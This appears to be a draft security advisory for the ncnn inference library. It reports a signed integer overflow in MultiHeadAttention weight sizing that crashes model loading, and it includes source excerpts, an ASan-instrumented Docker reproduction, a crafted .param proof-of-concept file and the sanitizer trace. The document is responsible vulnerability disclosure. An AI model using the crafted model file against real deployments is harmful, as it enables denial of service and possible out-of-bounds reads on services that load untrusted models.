All advisories
Draft

MultiHeadAttention Dimension Overflow Causes Conversion Crash

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

MultiHeadAttention Dimension Overflow Causes Conversion Crash

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/multiheadattention.cpp:190 in MultiHeadAttention::load_model
Sanitizer verdict: out of memory: allocator is trying to allocate 0x1555555844 bytes

The observed crash lands in src/allocator.h:62, which is the ISA-specialised copy of the reported code path.

Summary

MultiHeadAttention::load_model multiplies two attacker-controlled dimensions in signed int to size each projection weight buffer. With embed_dim = 3 and kdim = vdim = 1431655766 the product overflows and wraps to 2, so the loader allocates and accepts two-element weight buffers for tensors the rest of the pipeline believes are billions of elements long. The x86 MultiHeadAttention/Gemm pipeline then sizes its repacking buffer from the unwrapped kdim, and the process dies during model loading. The PoC drives ncnnllm2int, which calls Net::load_model on an attacker-supplied .param with null as the weight file.

Detail

The untrusted fields are the MultiHeadAttention parameters 0 (embed_dim), 3 (kdim) and 4 (vdim). load_param stores each with pd.get and no bound: embed_dim = pd.get(0, 0), kdim = pd.get(3, embed_dim), vdim = pd.get(4, embed_dim). Only quantize_term is validated.

load_model forms each weight extent as a product of two of those ints and passes it directly to mb.load. Signed overflow is undefined behaviour and in practice wraps modulo 2^32, so a huge kdim can be turned into a tiny, positive request. The .empty() guard that follows only confirms the buffer was allocated — it cannot detect that the requested extent is not the extent the pipeline will later assume, because the pipeline re-derives its own sizes from the raw, unwrapped kdim/vdim.

// src/layer/multiheadattention.cpp:53
    embed_dim = pd.get(0, 0);
    num_heads = pd.get(1, 1);
    weight_data_size = pd.get(2, 0);
    kdim = pd.get(3, embed_dim);
    vdim = pd.get(4, embed_dim);

// src/layer/multiheadattention.cpp:190
    k_weight_data = mb.load(embed_dim * kdim, 0);
    if (k_weight_data.empty())
        return -100;

// src/layer/x86/multiheadattention_x86.cpp:494
        pd.set(7, embed_dim); // M
        pd.set(8, 0);         // N
        pd.set(9, kdim);      // K

// src/layer/x86/gemm_x86.cpp:7473
        AT_data.create(TILE_K * TILE_M, nn_K, nn_M, 4u, (Allocator*)0);

With the PoC's 0=3 3=1431655766, embed_dim * kdim is 4294967298, which wraps to 2; mb.load(2, 0) succeeds against the empty data reader and the .empty() check passes. MultiHeadAttention_x86::create_pipeline then configures the K-projection Gemm with M = embed_dim = 3 and K = kdim = 1431655766 — the unwrapped value — and hands it the two-element k_weight_data as its constant A operand. Gemm_x86::create_pipeline sizes the repacked-A buffer from M and K, so AT_data.create requests roughly K * M * 4 bytes, the 0x1555555844 figure in the sanitizer output, and fastMalloc aborts the conversion process. Where the allocation succeeds instead, the packing loop that follows copies M * K floats out of a two-element source buffer.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-multiheadattention-dimension-overflow-causes-conversion-crash && cd ncnn-poc-multiheadattention-dimension-overflow-causes-conversion-crash

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'POC_EOF'
7767517
1 1
MultiHeadAttention mha 0 0 0=3 2=3 3=1431655766
POC_EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/quantize/ncnnllm2int poc.param null out.param out.bin

AddressSanitizer output:

=================================================================
==1==ERROR: AddressSanitizer: out of memory: allocator is trying to allocate 0x1555555844 bytes
    #0 0x7f41cc41af1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x585f468261e7 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x585f468261e7 in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
    #3 0x585f4cf61bc1 in ncnn::Gemm_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7473
    #4 0x585f4ee0b9e6 in ncnn::MultiHeadAttention_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/multiheadattention_x86_avx512.cpp:522
    #5 0x585f468c1562 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
    #6 0x585f467ca9d4 in main /ncnn/tools/quantize/ncnnllm2int.cpp:969
    #7 0x7f41cbda11c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x7f41cbda128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x585f4675f6e4 in _start (/ncnn/build/tools/quantize/ncnnllm2int+0x2a26e4) (BuildId: 425782183b6701315c7daa0360541799400e7e53)

==1==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 in posix_memalign
==1==ABORTING

Credit

Zheng Yu @ DepthFirst